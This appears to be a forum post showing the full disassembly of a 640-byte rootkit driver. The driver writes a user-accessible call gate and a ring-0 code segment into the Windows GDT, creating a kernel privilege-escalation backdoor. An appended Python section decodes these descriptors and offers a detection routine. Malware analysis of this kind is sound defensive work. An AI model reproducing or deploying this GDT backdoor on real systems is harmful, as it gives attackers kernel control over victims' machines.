A few days ago I found a hidden SYS file on my machine; AntiVir flagged it as a RootKit. When I took a look I discovered that it is very slim, only 640 bytes. Quite tempting, isn't it:
.text:00010200 .686p
.text:00010200 .mmx
.text:00010200 .model flat
.text:00010200
.text:00010200 ; ═══════════════════════════════════════════════════════════════════════════
.text:00010200
.text:00010200 ; Segment type: Pure code
.text:00010200 ; Segment permissions: Read/Execute
.text:00010200 _text segment para public 'CODE' use32
.text:00010200 assume cs:_text
.text:00010200 ;org 10200h
.text:00010200 assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
.text:00010200
.text:00010200 ; ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ S U B R O U T I N E ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
.text:00010200
.text:00010200 ; Attributes: bp-based frame
.text:00010200
.text:00010200 public start
.text:00010200 start proc near
.text:00010200
.text:00010200 var_2A = qword ptr -2Ah
.text:00010200
.text:00010200 push ebp
.text:00010201 mov ebp, esp
.text:00010203 nop
.text:00010204 nop
.text:00010205 nop
.text:00010206 nop
.text:00010207 pushf
.text:00010208 pusha
.text:00010209 push edx
.text:0001020A sgdt [esp+28h+var_2A]
.text:0001020F pop edx
.text:00010210 mov eax, edx
.text:00010212 mov ecx, 3E0h
.text:00010217 mov byte ptr [edx], 0C3h
.text:0001021A mov [ecx+edx], ax
.text:0001021E shr eax, 10h
.text:00010221 mov [ecx+edx+6], ax
.text:00010226 mov dword ptr [ecx+edx+2], 0EC0003E8h
.text:0001022E mov dword ptr [ecx+edx+8], 0FFFFh
.text:00010236 mov dword ptr [ecx+edx+0Ch], 0CF9A00h
.text:0001023E popa
.text:0001023F popf
.text:00010240 mov eax, 0
.text:00010245 leave
.text:00010246 retn 8
.text:00010246 start endp
.text:00010246
.text:00010246 ; ───────────────────────────────────────────────────────────────────────────
.text:00010249 align 20h
.text:00010249 _text ends
.text:00010249
.text:00010249
.text:00010249 end start
Judging from this code alone, it does not seem to have any file-hiding functionality, so there must be other dirty stuff in there; still searching.
Posting this for the record.
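As an added example, not part of the original post or the sample: the two descriptors the listing writes at GDT+3E0h and GDT+3E8h, rebuilt on a byte buffer and decoded with the standard Intel 32-bit descriptor layout, followed by the integrity check a defender would run over a GDT dump to catch this kind of modification. GDT_BASE is a constructed stand-in for whatever sgdt returns on a real machine.

```python
import struct

GDT_BASE = 0x8003F000  # constructed stand-in for the base that sgdt returns; not a value from the post

def gdt_image_from_listing(gdt_base, size=0x400):
    """Model on a plain byte buffer the stores the listing makes to the GDT (constructed, not the driver)."""
    gdt = bytearray(size)
    gdt[0] = 0xC3                                          # mov byte ptr [edx], 0C3h: a 'ret' inside the null descriptor
    off = 0x3E0                                            # mov ecx, 3E0h: descriptor slot 7Ch
    struct.pack_into("<H", gdt, off, gdt_base & 0xFFFF)    # mov [ecx+edx], ax: gate offset bits 0..15
    struct.pack_into("<I", gdt, off + 2, 0xEC0003E8)       # selector 03E8h, access EC = present, DPL 3, 32-bit call gate
    struct.pack_into("<H", gdt, off + 6, gdt_base >> 16)   # shr eax, 10h / mov [ecx+edx+6], ax: offset bits 16..31
    struct.pack_into("<I", gdt, off + 8, 0x0000FFFF)       # slot 7Dh: limit low FFFFh, base low 0
    struct.pack_into("<I", gdt, off + 0xC, 0x00CF9A00)     # access 9A = present, DPL 0, code; CF = G, D, limit high F
    return gdt

SYSTEM_TYPES = {0x2: "LDT", 0x4: "call gate 16", 0x9: "TSS 32", 0xB: "TSS 32 busy", 0xC: "call gate 32"}

def decode_descriptor(raw):
    """Decode one 8-byte GDT entry; byte 5 holds P, DPL, S and type for every descriptor kind."""
    access = raw[5]
    d = {"present": bool(access & 0x80), "dpl": (access >> 5) & 3, "type": access & 0xF}
    if access & 0x10 == 0:                                 # S=0: system descriptor (gate, TSS, LDT)
        d["kind"] = SYSTEM_TYPES.get(d["type"], "other system")
        d["selector"] = raw[2] | (raw[3] << 8)
        d["offset"] = raw[0] | (raw[1] << 8) | (raw[6] << 16) | (raw[7] << 24)
    else:                                                  # S=1: code or data segment
        d["kind"] = "code" if access & 0x8 else "data"
        d["base"] = raw[2] | (raw[3] << 8) | (raw[4] << 16) | (raw[7] << 24)
        limit = raw[0] | (raw[1] << 8) | ((raw[6] & 0xF) << 16)
        d["limit"] = ((limit << 12) | 0xFFF) if raw[6] & 0x80 else limit   # G bit: 4 KiB granularity
    return d

def find_ring3_gates_to_ring0(gdt, gdt_base):
    """Integrity check over a GDT dump: report present call gates reachable from ring 3 whose target code
    segment has DPL 0. A stock Windows GDT has none, so every hit is an alert; entry_inside_gdt flags the
    sample's second oddity, an entry point that lies inside the GDT itself."""
    hits = []
    for idx in range(1, len(gdt) // 8):                    # slot 0 is the null descriptor
        gate = decode_descriptor(gdt[idx * 8: idx * 8 + 8])
        if not (gate["present"] and gate["kind"].startswith("call gate") and gate["dpl"] == 3):
            continue
        t = gate["selector"] >> 3                          # selector index -> descriptor slot
        if t * 8 + 8 > len(gdt):
            continue                                       # target outside the dump: cannot judge it
        target = decode_descriptor(gdt[t * 8: t * 8 + 8])
        if target["present"] and target["kind"] == "code" and target["dpl"] == 0:
            hits.append({"gate_selector": idx << 3, "target_selector": gate["selector"],
                         "entry_offset": gate["offset"], "target_base": target["base"],
                         "entry_inside_gdt": gdt_base <= gate["offset"] < gdt_base + len(gdt)})
    return hits
```

On a live system the same check runs over the GDT read back from a kernel debugger or memory dump; a non-zero null descriptor (the 0C3h byte here) is a second, independent alert.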